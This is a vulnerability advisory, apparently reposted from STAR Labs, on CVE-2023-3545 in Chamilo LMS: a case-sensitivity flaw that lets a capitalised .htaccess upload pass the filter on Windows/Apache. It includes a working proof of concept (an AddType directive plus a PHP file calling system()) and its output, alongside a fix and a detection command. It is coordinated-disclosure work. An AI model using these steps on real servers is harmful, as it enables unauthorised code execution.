(CVE-2023-3545) Chamilo LMS Htaccess File Upload Security Bypass

(CVE-2023-3545) Chamilo LMS Htaccess File Upload Security Bypass
2023-11-28 08:0:0 Author: starlabs.sg(查看原文) 阅读量:27 收藏

Summary

Product	Chamilo
Vendor	Chamilo
Severity	High - Adversaries may exploit software vulnerabilities to obtain unauthenticated remote code execution.
Affected Versions	<= v1.11.20
Tested Versions	v1.11.20 (latest version as of writing)
CVE Identifier	CVE-2023-3545
CVE Description	Improper sanitisation in `main/inc/lib/fileUpload.lib.php` in Chamilo LMS <= v1.11.20 on Windows and Apache installations allows unauthenticated attackers to bypass file upload security protections and obtain remote code execution via uploading of `.htaccess` file. This vulnerability may be exploited by privileged attackers or chained with unauthenticated arbitrary file write vulnerabilities, such as CVE-2023-3533, to achieve remote code execution.
CWE Classification(s)	CWE-178: Improper Handling of Case Sensitivity
CAPEC Classification(s)	CAPEC-650: Upload a Web Shell to a Web Server

CVSS3.1 Scoring System

Base Score: 9.8 (Critical)
Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:N/C:H/I:H/A:H

Metric	Value
Attack Vector (AV)	Network
Attack Complexity (AC)	Low
Privileges Required (PR)	None
User Interaction (UI)	None
Scope (S)	Unchanged
Confidentiality (C)	High
Integrity (I)	High
Availability (A)	High

Product Overview

Chamilo is an open-source PHP-based Learning Management System (LMS) that facilitates online education and training. It offers features such as course creation, content management, assessments, collaboration and delivering educational resources.

Vulnerability Summary

The htaccess2txt() function in main/inc/lib/fileUpload.lib.php does not correctly prevent uploading of valid .htaccess files on Windows systems. Consequently, an unauthenticated attacker can chain this vulnerability with unauthenticated arbitrary file write vulnerabilities, CVE-2023-3533, to achieve remote code execution.

Vulnerability Details

The relevant vulnerable code in main/inc/lib/fileUpload.lib.php is shown below:

function htaccess2txt($filename)
{
    return str_replace(['.htaccess', '.HTACCESS'], ['htaccess.txt', 'htaccess.txt'], $filename);
}

Observe that case-sensitive replacement of .htaccess and .HTACCESS is performed. By default, on Windows systems, filenames are case-insensitive. As such, any capitalised variants of .htaccess are treated as valid .htaccess files.

Some examples of valid .htaccess files:

.Htaccess
.HTaccess
.htAccess

Consequently, an authenticated attacker with Trainer role can exploit this vulnerability to obtain remote code execution. A trainer can upload a valid .htaccess file to include an AddType directive to treat file extensions as PHP scripts:

AddType application/x-httpd-php .1337

Then, upload a PHP file named with the .1337 extension and visiting the http(s)://<chamilo>/app/courses/<course_id>/document/<filename> to execute the uploaded file as a PHP script.

However, the maximum impact is unauthenticated remote code execution on Windows with Apache installations, as this vulnerability may also be chained with CVE-2023-3533 (unauthenticated arbitrary file write).

Exploit Conditions

For remote code execution to be possible, the following conditions must be satisfied:

The target must be running on Windows systems.
The target must be using Apache web server (to allow .htaccess processing).

An unauthenticated attacker may chain an unauthenticated arbitrary file write vulnerability, such as CVE-2023-3533, to achieve remote code execution. Alternatively, an authenticated attacker with Trainer role or above may exploit the vulnerability without chaining with other vulnerabilities.

Proof-of-Concept

The following proof-of-concept demonstrates how the vulnerability in this report can be exploited by an authenticated attacker with Trainer role.

Log in to an account with Trainer role.
Create a new course named TESTCOURSE.
Navigate to http://<chamilo>/main/document/upload.php?cidReq=TESTCOURSE.
Upload a file named .htAccess with the following file contents:
```
AddType application/x-httpd-php .1337
```
Upload a file named rce.1337 with the following file contents:
```
<?php
   system("type C:\\Windows\\win.ini");
?>
```
Navigate to http://<chamilo>/app/courses/TESTCOURSE/document/rce.1337. Observe that the contents of C:\Windows\win.ini is returned, indicating that the attacker has successfully achieved remote code execution:
```
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
```

Suggested Mitigations

Ensure that the renaming of .htaccess to htaccess.txt is done by replacing case-insensitively.

For example:

function htaccess2txt($filename)
{
-    return str_replace(['.htaccess', '.HTACCESS'], ['htaccess.txt', 'htaccess.txt'], $filename);
+    return str_ireplace('.htaccess', 'htaccess.txt', $filename);
}

End users are encouraged to update to the latest version of Chamilo.

Detection Guidance

It is possible to detect the exploitation of this vulnerability by checking the web root and its subdirectories for suspicious .htaccess file (i.e. not .htaccess and not .HTACCESS): For example, the following command can be used on UNIX-based systems:

$ find . \( -iname '.htaccess' -a -not -name '.htaccess' -a -not -name '.HTACCESS' \)

Credits

Ngo Wei Lin (@Creastery) of STAR Labs SG Pte. Ltd. (@starlabs_sg)

Timeline

2023-07-13 Vendor Disclosure
2023-07-14 Initial Vendor Contact
2023-07-18 Vendor published the vulnerability sumamry
2023-07-17 Mutual agreement to delay the publication of vulnerability details was reached in light of the recent in-the-wild exploitation of Chamilo N-day vulnerability (CVE-2023-34960)
2023-08-03 Vendor Patch Release (v1.11.22) completely fixing vulnerability
2023-11-28 Public Disclosure

文章来源: https://starlabs.sg/advisories/23/23-3545/
如有侵权请联系:admin#unsafe.sh